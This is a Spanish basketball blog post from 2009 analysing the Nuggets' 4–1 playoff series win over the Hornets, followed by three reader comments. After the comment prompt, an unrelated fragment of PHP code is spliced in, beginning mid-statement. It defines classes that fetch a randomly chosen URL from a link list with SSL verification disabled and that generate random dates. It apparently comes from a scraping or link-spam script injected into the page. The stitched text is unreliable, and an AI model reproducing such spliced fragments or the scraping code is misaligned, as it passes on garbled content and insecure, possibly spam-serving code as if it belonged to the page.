Nuggets 4 – Hornets 1: Abusando del momento

30 de April de 2009 por TheDeerHunter

Duro varapalo para los Hornets, como también para nuestro pronóstico. No podíamos imaginar la magnitud de la caída, la cual chirría más todavía contrastada con el esplendor del juego de Billups. Sin ninguna duda, uno de los hombres del año.
Un equipo que vive y muere a través de Chris Paul, ha sufrido con él su peor mal trago desde que llegó a la liga. No ya sólo por su colapso anotador sino también por su inesperada incapacidad de controlar a su magistral par. Billups le ha dado una lección en toda regla.

Y si Paul no ha jugado bien, lo del resto ha llegado hasta el ridículo, coronado con el palizón histórico que se llevaron el otro día. 84 puntos por partido en esta serie (12 menos que en la regular) y 108 recibidos (13 más) muy probablemente le costarán el puesto a Byron Scott. Pero él no ha lanzado un horripilante 30% como sí lo han hecho sus jugadores. Sería posible hacerlo peor, pero habría que esforzarse mucho.
Con estos datos en la mano casi es de Perogrullo revisar las claves que anticipamos en su día. Pudieron contar con Chandler pero no al 100% y por ahí nacen los graves problemas defensivos con una zona que invitaba a entrar como Pedro por su casa. Por su nivel defensivo se contrató a Posey pero nada ha podido hacer contra un Melo que por fin ha sabido focalizar su genio. Sin hablar de la acertada segunda línea de los Nuggets, con JR Smith o Kleiza… contra un banquillo rival prácticamente nulo. Nada positivo podemos encontrar en todo el panorama de los Hornets. Sólo el ardor emocional en casa les permitió evitar la barrida.

Del Denver-Mavs ya hablaremos en su momento. Por parte de los Hornets esto no ha hecho nada más que empezar. Del equipo joven e ilusionante que estuvo a punto de eliminar a los Spurs el año pasado hemos pasado a esta banda y los palos van a llover por todos lados. Allí no tiene el puesto asegurado ni el utillero. Pero es que el problema es gordo. El equipo está hipotecado hasta las cejas hasta el 2011, con contratos mastodónticos como el de Stojakovic, Chandler o Morris Peterson que, obviamente, no se ajustan a su aportación efectiva en el juego. El traspaso fallido del pívot finalmente ha sido lo peor que les podría haber pasado. Y dar profundidad a una plantilla sin un dólar extra disponible se antoja harto difícil. Un jugador con el cartel de Chris Paul no soportará demasiado tiempo esta situación. No sería la primera vez que se especula con su marcha.

El cambio podría pasar por el cuerpo técnico, excesivamente castigado tras estos resultados. Sin embargo, no es sencillo encontrar un sustituto del nivel del entrenador del año de la pasada temporada. Demasiadas sombras se ciernen sobre New Orleans.

Comenta

3 comentarios a esta entrada

  1. Fran Reyes dice:
    #1

    No recuerdo haberlo comentado en su día, pero a mí el duelo en la zona Nené vs Chandler me parecía bastante representativo de lo que era la eliminatoria y los equipos: talento en evolución contra mediocridad decadente tomada como decencia por unas excepciones (CP3, West) que sólo confirman la regla y dejan en evidencia a sus compañeros…

      Citar

  2. couxe dice:
    #2

    Bueno… soy un gran pitoniso…
    Entre otras cosas dije que pasaba N.Orleans y que Paul se comía a Billups… Además de esto, también dije que Portland podía ganar fácil su eliminatoria…
    Soy un crack….

    Por cierto…. La serie Boston – Chicago ya se puede afirmar que pasará a la historia gane quien gane… Simplemente impresionante… esta noche nada menos que 3 prórrogas… Y yo voy y me quedo frito en el primer cuarto… En fín….

      Citar

  3. toni dice:
    #3

    Yo opinaba lo mismo que “couxe”, pero el sr. Billups nos ha dado en la frente llevando magistralmente sus nuggets y lo decisivo de la eliminatoria, dejando por los suelos a el que para muchos es el mejor base de la liga, CP3.

    Billups se agarró a un clavo ardiendo como era denver con tal de no hundirse con esos Pistons que ya holían mal… y le ha salido de lujo aunque la pregunta es:
    ¿Serán capaces estos Nuggets de plantarle cara a los Lakers?
    Ya tengo ganas de verlo.
    Antes de eso se tendrán que deshacer de los Mavs…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>